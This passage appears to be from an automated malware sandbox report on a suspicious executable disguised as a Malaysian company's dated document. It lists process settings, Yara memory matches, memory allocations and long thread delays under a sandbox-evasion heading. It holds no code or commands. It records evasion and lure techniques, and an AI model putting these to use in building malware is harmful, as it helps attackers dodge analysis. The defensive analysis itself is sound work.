                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Source: Yara matchFile source: Process Memory Space: Autofill Manufacturing Sdn Bhd 28-08-2024.exe PID: 7968, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: GhrKoSGuCdvpJ.exe PID: 7032, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeMemory allocated: AC0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeMemory allocated: 2470000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeMemory allocated: 4470000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeMemory allocated: 7290000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeMemory allocated: 6880000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeMemory allocated: 8290000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeMemory allocated: 9290000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeMemory allocated: 10A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeMemory allocated: 2D60000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeMemory allocated: 2C70000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeMemory allocated: 3060000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeMemory allocated: 3250000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeMemory allocated: 5250000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeMemory allocated: 7AA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeMemory allocated: 8AA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeMemory allocated: 8C30000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeMemory allocated: 9C30000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeMemory allocated: 3160000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeMemory allocated: 3230000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeMemory allocated: 3160000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
